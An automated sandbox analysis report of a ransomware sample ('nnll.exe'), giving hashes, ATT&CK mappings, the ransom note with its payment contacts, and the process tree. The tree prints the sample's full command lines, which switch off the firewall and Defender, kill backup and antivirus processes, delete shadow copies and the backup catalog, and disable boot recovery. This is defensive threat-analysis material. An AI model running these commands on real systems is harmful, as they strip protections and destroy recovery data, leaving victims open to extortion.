dd595da7ed62a415d319d4903c62312bf52e10603b54c2051b45c6ca955606a3

Analysis

max time kernel
117s
max time network
121s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
18-09-2023 17:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

nnll.exe
Size

917KB
MD5

bd5c08142cf5d80157242c950ef85e62
SHA1

7b4657f833fd25f579bfc49abc42ac16e9bff697
SHA256

dd595da7ed62a415d319d4903c62312bf52e10603b54c2051b45c6ca955606a3
SHA512

c48b348cc9e606622a259cf6fa18f975866ab36036b546fe92551a3ae4bd510e2baf64a4cbdf4b7c09fc6f3f7b9fa949847d92766bd9d0261b0517d0b8d9c9db
SSDEEP

24576:o8m657w6ZBLmkitKqBCjC0PDgM5AH5DT+j:MVV1BCjBEDT

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\_Readme.txt

Ransom Note

ATTENTION! Don’t worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-O0PCajl3M8 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that’s price for you is $490. Please note that you’ll never restore your data without payment. Check your e-mail “Spam” or “Junk” folder if you don’t get answer more than 6 hours. To get this software you need write on our e-mail: datarestorehelp@proton.me Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: STHqZbUCFbdCjfPuBkwrrKbO5skGMKrnyN44WrgI

Emails

datarestorehelp@proton.me

supportsys@airmail.cc

URLs

https://we.tl/t-O0PCajl3M8

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 1 TTPs 5 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

2792 netsh.exe
624 netsh.exe
1132 netsh.exe
2976 netsh.exe
1596 netsh.exe
Loads dropped DLL 4 IoCs

Processes:

nnll.exe

pid process

1708 nnll.exe
1708 nnll.exe
1708 nnll.exe
1708 nnll.exe

pid	process
2792	netsh.exe
624	netsh.exe
1132	netsh.exe
2976	netsh.exe
1596	netsh.exe

pid	process
1708	nnll.exe
1708	nnll.exe
1708	nnll.exe
1708	nnll.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

nnll.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe"	nnll.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1960 vssadmin.exe

pid	process
1960	vssadmin.exe

Kills process with taskkill 42 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2336	taskkill.exe
2352	taskkill.exe
2768	taskkill.exe
1564	taskkill.exe
1376	taskkill.exe
2220	taskkill.exe
2980	taskkill.exe
2940	taskkill.exe
948	taskkill.exe
700	taskkill.exe
1792	taskkill.exe
1580	taskkill.exe
1552	taskkill.exe
2564	taskkill.exe
2884	taskkill.exe
1392	taskkill.exe
2356	taskkill.exe
2612	taskkill.exe
1564	taskkill.exe
1988	taskkill.exe
2308	taskkill.exe
2856	taskkill.exe
2672	taskkill.exe
1296	taskkill.exe
2664	taskkill.exe
2768	taskkill.exe
2700	taskkill.exe
812	taskkill.exe
1040	taskkill.exe
1620	taskkill.exe
2388	taskkill.exe
1772	taskkill.exe
1204	taskkill.exe
1160	taskkill.exe
1780	taskkill.exe
2012	taskkill.exe
2120	taskkill.exe
2356	taskkill.exe
2136	taskkill.exe
2000	taskkill.exe
840	taskkill.exe
2280	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

2068 reg.exe
1568 reg.exe
Opens file in notepad (likely ransom note) 3 IoCs
ransomware

Processes:

NOTEPAD.EXENOTEPAD.EXENOTEPAD.EXE

pid process

2144 NOTEPAD.EXE
2336 NOTEPAD.EXE
668 NOTEPAD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1640 powershell.exe

pid	process
2068	reg.exe
1568	reg.exe

pid	process
2144	NOTEPAD.EXE
2336	NOTEPAD.EXE
668	NOTEPAD.EXE

pid	process
1640	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

nnll.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exevssvc.exetaskkill.exeWMIC.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1708	nnll.exe
Token: SeDebugPrivilege	2768	taskkill.exe
Token: SeDebugPrivilege	2336	taskkill.exe
Token: SeDebugPrivilege	2940	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	2700	taskkill.exe
Token: SeDebugPrivilege	2884	taskkill.exe
Token: SeDebugPrivilege	812	taskkill.exe
Token: SeDebugPrivilege	948	taskkill.exe
Token: SeDebugPrivilege	2120	taskkill.exe
Token: SeDebugPrivilege	1772	taskkill.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	1040	taskkill.exe
Token: SeDebugPrivilege	700	taskkill.exe
Token: SeDebugPrivilege	2356	taskkill.exe
Token: SeDebugPrivilege	2136	taskkill.exe
Token: SeDebugPrivilege	2000	taskkill.exe
Token: SeDebugPrivilege	840	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	1392	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	2280	taskkill.exe
Token: SeDebugPrivilege	1792	taskkill.exe
Token: SeBackupPrivilege	1964	vssvc.exe
Token: SeRestorePrivilege	1964	vssvc.exe
Token: SeAuditPrivilege	1964	vssvc.exe
Token: SeDebugPrivilege	1780	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2076	WMIC.exe
Token: SeSecurityPrivilege	2076	WMIC.exe
Token: SeTakeOwnershipPrivilege	2076	WMIC.exe
Token: SeLoadDriverPrivilege	2076	WMIC.exe
Token: SeSystemProfilePrivilege	2076	WMIC.exe
Token: SeSystemtimePrivilege	2076	WMIC.exe
Token: SeProfSingleProcessPrivilege	2076	WMIC.exe
Token: SeIncBasePriorityPrivilege	2076	WMIC.exe
Token: SeCreatePagefilePrivilege	2076	WMIC.exe
Token: SeBackupPrivilege	2076	WMIC.exe
Token: SeRestorePrivilege	2076	WMIC.exe
Token: SeShutdownPrivilege	2076	WMIC.exe
Token: SeDebugPrivilege	2076	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2076	WMIC.exe
Token: SeRemoteShutdownPrivilege	2076	WMIC.exe
Token: SeUndockPrivilege	2076	WMIC.exe
Token: SeManageVolumePrivilege	2076	WMIC.exe
Token: 33	2076	WMIC.exe
Token: 34	2076	WMIC.exe
Token: 35	2076	WMIC.exe
Token: SeDebugPrivilege	1376	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2076	WMIC.exe
Token: SeSecurityPrivilege	2076	WMIC.exe
Token: SeTakeOwnershipPrivilege	2076	WMIC.exe
Token: SeLoadDriverPrivilege	2076	WMIC.exe
Token: SeSystemProfilePrivilege	2076	WMIC.exe
Token: SeSystemtimePrivilege	2076	WMIC.exe
Token: SeProfSingleProcessPrivilege	2076	WMIC.exe
Token: SeIncBasePriorityPrivilege	2076	WMIC.exe
Token: SeCreatePagefilePrivilege	2076	WMIC.exe
Token: SeBackupPrivilege	2076	WMIC.exe
Token: SeRestorePrivilege	2076	WMIC.exe
Token: SeShutdownPrivilege	2076	WMIC.exe
Token: SeDebugPrivilege	2076	WMIC.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

nnll.exeNOTEPAD.EXE

pid process

1708 nnll.exe
2144 NOTEPAD.EXE
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

nnll.exe

pid process

1708 nnll.exe

pid	process
1708	nnll.exe
2144	NOTEPAD.EXE

pid	process
1708	nnll.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

nnll.execmd.execmd.exe

description	pid	process	target process
PID 1708 wrote to memory of 2272	1708	nnll.exe	cmd.exe
PID 1708 wrote to memory of 2272	1708	nnll.exe	cmd.exe
PID 1708 wrote to memory of 2272	1708	nnll.exe	cmd.exe
PID 1708 wrote to memory of 2272	1708	nnll.exe	cmd.exe
PID 1708 wrote to memory of 2764	1708	nnll.exe	cmd.exe
PID 1708 wrote to memory of 2764	1708	nnll.exe	cmd.exe
PID 1708 wrote to memory of 2764	1708	nnll.exe	cmd.exe
PID 1708 wrote to memory of 2764	1708	nnll.exe	cmd.exe
PID 2272 wrote to memory of 2792	2272	cmd.exe	netsh.exe
PID 2272 wrote to memory of 2792	2272	cmd.exe	netsh.exe
PID 2272 wrote to memory of 2792	2272	cmd.exe	netsh.exe
PID 2272 wrote to memory of 2792	2272	cmd.exe	netsh.exe
PID 2764 wrote to memory of 2768	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2768	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2768	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2768	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2336	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2336	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2336	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2336	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2940	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2940	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2940	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2940	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 1564	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 1564	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 1564	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 1564	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2700	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2700	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2700	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2700	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2884	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2884	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2884	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2884	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 812	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 812	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 812	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 812	2764	cmd.exe	taskkill.exe
PID 2272 wrote to memory of 624	2272	cmd.exe	netsh.exe
PID 2272 wrote to memory of 624	2272	cmd.exe	netsh.exe
PID 2272 wrote to memory of 624	2272	cmd.exe	netsh.exe
PID 2272 wrote to memory of 624	2272	cmd.exe	netsh.exe
PID 2272 wrote to memory of 1132	2272	cmd.exe	netsh.exe
PID 2272 wrote to memory of 1132	2272	cmd.exe	netsh.exe
PID 2272 wrote to memory of 1132	2272	cmd.exe	netsh.exe
PID 2272 wrote to memory of 1132	2272	cmd.exe	netsh.exe
PID 2764 wrote to memory of 948	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 948	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 948	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 948	2764	cmd.exe	taskkill.exe
PID 2272 wrote to memory of 2976	2272	cmd.exe	cmd.exe
PID 2272 wrote to memory of 2976	2272	cmd.exe	cmd.exe
PID 2272 wrote to memory of 2976	2272	cmd.exe	cmd.exe
PID 2272 wrote to memory of 2976	2272	cmd.exe	cmd.exe
PID 2764 wrote to memory of 2120	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2120	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2120	2764	cmd.exe	taskkill.exe
PID 2764 wrote to memory of 2120	2764	cmd.exe	taskkill.exe
PID 2272 wrote to memory of 1596	2272	cmd.exe	netsh.exe
PID 2272 wrote to memory of 1596	2272	cmd.exe	netsh.exe
PID 2272 wrote to memory of 1596	2272	cmd.exe	netsh.exe
PID 2272 wrote to memory of 1596	2272	cmd.exe	netsh.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\nnll.exe
"C:\Users\Admin\AppData\Local\Temp\nnll.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1708

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2272

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state off
3⤵
- Modifies Windows Firewall
PID:2792

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
3⤵
- Modifies Windows Firewall
PID:624

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set domainprofile state off
3⤵
- Modifies Windows Firewall
PID:1132

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set privateprofile state off
3⤵
- Modifies Windows Firewall
PID:2976

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set publicprofile state off
3⤵
- Modifies Windows Firewall
PID:1596

C:\Windows\SysWOW64\reg.exe
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
3⤵
PID:980

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
- Modifies registry key
PID:1568

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
3⤵
- Modifies registry key
PID:2068

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionExtension .exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
2⤵
- Suspicious use of WriteProcessMemory
PID:2764

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM BackupExecAgentBrowser*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2768

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM BackupExecDiveciMediaService*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM BackupExecJobEngine*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM BackupExecManagementService*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM vss*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2700

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM sql*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2884

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM svc$*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:812

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM memtas*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:948

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM sophos*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM backup*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1988

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM GxVss*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1040

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM GxBlr*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:700

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM GxFWD*
3⤵
- Kills process with taskkill
PID:2356

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM GxCVD*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2136

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM GxCIMgr*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM DefWatch*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:840

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM ccEvtMgr*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM SavRoam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM RTVscan*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1204

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM QBFCService*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM Intuit.QuickBooks.FCS*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM YooBackup*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM YooIT*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM zhudongfangyu*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM sophos*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1376

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM stc_raw_agent*
3⤵
- Kills process with taskkill
PID:2012

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM VSNAPVSS*
3⤵
- Kills process with taskkill
PID:2308

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM QBCFMonitorService*
3⤵
- Kills process with taskkill
PID:2352

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM VeeamTransportSvc*
3⤵
- Kills process with taskkill
PID:2220

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM VeeamDeploymentService*
3⤵
- Kills process with taskkill
PID:2980

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM VeeamNFSSvc*
3⤵
- Kills process with taskkill
PID:2388

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM veeam*
3⤵
- Kills process with taskkill
PID:1580

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM PDVFSService*
3⤵
- Kills process with taskkill
PID:1552

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM BackupExecVSSProvider*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2356

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM BackupExecAgentAccelerator*
3⤵
- Kills process with taskkill
PID:2612

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM BackupExecRPCService*
3⤵
- Kills process with taskkill
PID:2856

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM AcrSch2Svc*
3⤵
- Kills process with taskkill
PID:2672

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM AcronisAgent*
3⤵
- Kills process with taskkill
PID:2564

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM CASAD2DWebSvc*
3⤵
- Kills process with taskkill
PID:1296

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM CAARCUpdateSvc*
3⤵
- Kills process with taskkill
PID:2768

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM TeamViewer*
3⤵
- Kills process with taskkill
PID:2664

C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\_Readme.txt
2⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:2144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
2⤵
PID:2976

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1960

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2076

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1964

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_Readme.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:2336

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:240

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Pictures\_Readme.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:668

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\_Readme.txt
Filesize
1KB

MD5
eb6ea81ec2689ba081c4f45fb8a2322e

SHA1
c89d597126a92d91dc74320334255b2d825ab7c0

SHA256
f53a4589b0ee85c8f87c13e74100c60805a81d16846f703edcb5eccf1cc63c9e

SHA512
9c68a1a4daf06cb7754f08bd899f599cad92dc0957cd079aba3455b78f73dcef4880f824339c8d0b31a8f95ac5e6bf00223275ced283e6c2518c3b58c00ef6ec

Download Submit
C:\Users\Admin\AppData\Roaming\ext
Filesize
8B

MD5
4042e932af55891d81109dfada27acf4

SHA1
fcd36fd7404829744115721172bd63401d933255

SHA256
2b6267734a23579a9b32c4620755037502909b28868a10787f0eb6267325397b

SHA512
22cb750650b22f96391bd023e6f7e4c2339ddb7b084f11e8e0671a20cf5c1fa15a02ec8f5c9a9413c4fdf0297ea6a68709f9c3f8bea5109d6352da4a7f3af2ce

Download Submit
C:\Users\Admin\Desktop\_Readme.txt
Filesize
1KB

MD5
eb6ea81ec2689ba081c4f45fb8a2322e

SHA1
c89d597126a92d91dc74320334255b2d825ab7c0

SHA256
f53a4589b0ee85c8f87c13e74100c60805a81d16846f703edcb5eccf1cc63c9e

SHA512
9c68a1a4daf06cb7754f08bd899f599cad92dc0957cd079aba3455b78f73dcef4880f824339c8d0b31a8f95ac5e6bf00223275ced283e6c2518c3b58c00ef6ec

Download Submit
C:\Users\Admin\Downloads\_Readme.txt
Filesize
1KB

MD5
eb6ea81ec2689ba081c4f45fb8a2322e

SHA1
c89d597126a92d91dc74320334255b2d825ab7c0

SHA256
f53a4589b0ee85c8f87c13e74100c60805a81d16846f703edcb5eccf1cc63c9e

SHA512
9c68a1a4daf06cb7754f08bd899f599cad92dc0957cd079aba3455b78f73dcef4880f824339c8d0b31a8f95ac5e6bf00223275ced283e6c2518c3b58c00ef6ec

Download Submit
C:\Users\Admin\Pictures\_Readme.txt
Filesize
1KB

MD5
eb6ea81ec2689ba081c4f45fb8a2322e

SHA1
c89d597126a92d91dc74320334255b2d825ab7c0

SHA256
f53a4589b0ee85c8f87c13e74100c60805a81d16846f703edcb5eccf1cc63c9e

SHA512
9c68a1a4daf06cb7754f08bd899f599cad92dc0957cd079aba3455b78f73dcef4880f824339c8d0b31a8f95ac5e6bf00223275ced283e6c2518c3b58c00ef6ec

Download Submit
\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
